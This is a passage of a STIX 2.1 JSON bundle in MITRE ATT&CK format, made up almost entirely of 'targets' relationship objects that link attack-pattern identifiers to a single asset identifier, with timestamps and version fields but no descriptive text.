"x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6af54415-b171-4b3c-8e7c-d89e6d85595b", "created": "2024-07-01T10:37:15.838470", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838472", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--090a9803-6ec3-44b8-91b0-f781871e3dbf", "created": "2024-07-01T10:37:15.838480", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838482", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--39fcab1f-0f8d-455e-a447-89bcf1fba824", "created": "2024-07-01T10:37:15.838489", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838491", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e3f0ad55-1cae-4e7e-81ec-f209d5d26015", "created": "2024-07-01T10:37:15.838498", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838500", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b77cf5f3-6060-475d-bd60-40ccbf28fdc2", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2dd69119-ef20-4681-84b0-e11dbef041ce", "created": "2024-07-01T10:37:15.838508", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838510", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a3c12ee1-86f6-4377-86c9-f165b6870940", "created": "2024-07-01T10:37:15.838517", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838519", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--263ecf03-3939-4396-a81d-045f9cc7a80f", "created": "2024-07-01T10:37:15.838526", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838528", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1086f18c-327a-4d22-aa7f-5f401fcec762", "created": "2024-07-01T10:37:15.838536", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838538", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--52c0ec20-5cbb-417e-ac41-952b2af139c7", "created": "2024-07-01T10:37:15.838545", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838547", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--20d5b3c9-ba4c-4899-9a78-9655bbdf7534", "created": "2024-07-01T10:37:15.838555", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838557", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b1c8be45-c43a-43e8-89d0-ec9f90b31589", "created": "2024-07-01T10:37:15.838564", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838566", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ba04e672-da86-4e69-aa15-0eca5db25f43", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9ff0c61b-e268-42ea-83b2-7b2ad34f2bb2", "created": "2024-07-01T10:37:15.838573", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838575", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5d6b00b3-4b88-4a10-b1c3-1909e1096912", "created": "2024-07-01T10:37:15.838583", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838585", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bb5e59c4-abe7-40c7-8196-e373cb1e5974", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f8abb161-06c9-4766-a47f-e605280a96c4", "created": "2024-07-01T10:37:15.838592", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838594", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8daf2ebe-ac08-401e-b411-2452f46a7a8d", "created": "2024-07-01T10:37:15.838602", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838604", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f8b216de-2797-47ff-93a1-2606124da8f8", "created": "2024-07-01T10:37:15.838611", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838613", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--df98b6a3-c7a1-4bc1-a48b-df5462668d54", "created": "2024-07-01T10:37:15.838621", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838623", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2be2554f-29eb-47b4-a602-cb8fbf1c3e18", "created": "2024-07-01T10:37:15.838630", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838632", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--59a03fda-54f6-4c0e-8c47-d7cefd7b398c", "created": "2024-07-01T10:37:15.838639", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838641", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bef8aaee-961d-4359-a308-4c2182bcedff", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cd9a70a4-b0f0-4b05-80ae-13c9973e02a7", "created": "2024-07-01T10:37:15.838649", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838651", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf147104-abf9-4221-95d1-e81585859441", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bdaf3e99-4215-4d79-83db-0c75f02ba2c9", "created": "2024-07-01T10:37:15.838658", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838660", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1c1b14fc-b771-4311-bf7b-eeb8225f5db1", "created": "2024-07-01T10:37:15.838667", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838669", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--264c9fc3-f688-4d54-8b76-b31c1edfdec8", "created": "2024-07-01T10:37:15.838677", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838679", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--32b2b38e-54c1-44bc-a341-8fbf993a760c", "created": "2024-07-01T10:37:15.838686", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838688", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--015c92c4-6388-4f71-9677-10b0d2b928ef", "created": "2024-07-01T10:37:15.838696", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838698", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c1b68a96-3c48-49ea-a6c0-9b27359f9c19", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--83b9fedc-3f80-497f-8300-2ad9b3e417e7", "created": "2024-07-01T10:37:15.838705", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838707", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6e627c15-105f-4441-9902-7e1ecd86dbe3", "created": "2024-07-01T10:37:15.838715", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838717", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--46b7d254-0e86-4547-ba13-17d316a588ba", "created": "2024-07-01T10:37:15.838724", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838726", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bf93dbbd-3c80-4f43-b3e7-08442064901b", "created": "2024-07-01T10:37:15.838733", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838735", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f4fd22f5-f7f5-4fa5-aa2b-1b58d1f8ee66", "created": "2024-07-01T10:37:15.838743", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838745", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e975f063-7fed-4141-9ef0-a874952b640b", "created": "2024-07-01T10:37:15.838752", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838754", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6d056246-0c52-4eb2-b162-a305d05f4556", "created": "2024-07-01T10:37:15.838761", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838763", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c48a67ee-b657-45c1-91bf-6cdbe27205f8", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1e6471e9-2e57-4ab9-bcc9-35e01145d75b", "created": "2024-07-01T10:37:15.838771", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838773", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6262492a-9fcd-481f-97a1-cf3b8770fc19", "created": "2024-07-01T10:37:15.838818", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838820", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c63a348e-ffc2-486a-b9d9-d7f11ec54d99", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e0956236-061a-480f-aeff-a67c441a4a24", "created": "2024-07-01T10:37:15.838828", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838830", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--262e1bc3-6499-4c53-9c54-6774d951cf6a", "created": "2024-07-01T10:37:15.838838", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838840", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8f04fe4b-5c48-4c7b-8a6b-78f1d7f1bde9", "created": "2024-07-01T10:37:15.838847", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838849", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bd6238e6-0a47-4a43-b782-3e18428dd4cc", "created": "2024-07-01T10:37:15.838857", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838859", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--84eca7a2-4593-4d21-be99-59eb08e2fc38", "created": "2024-07-01T10:37:15.838866", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838868", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e9647e1b-3576-40b5-814f-a26451e677f4", "created": "2024-07-01T10:37:15.838876", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838878", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c892cfda-6977-4449-81cd-e6d912cb4422", "created": "2024-07-01T10:37:15.838885", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838887", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c9e0c59e-162e-40a4-b8b1-78fab4329ada", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", 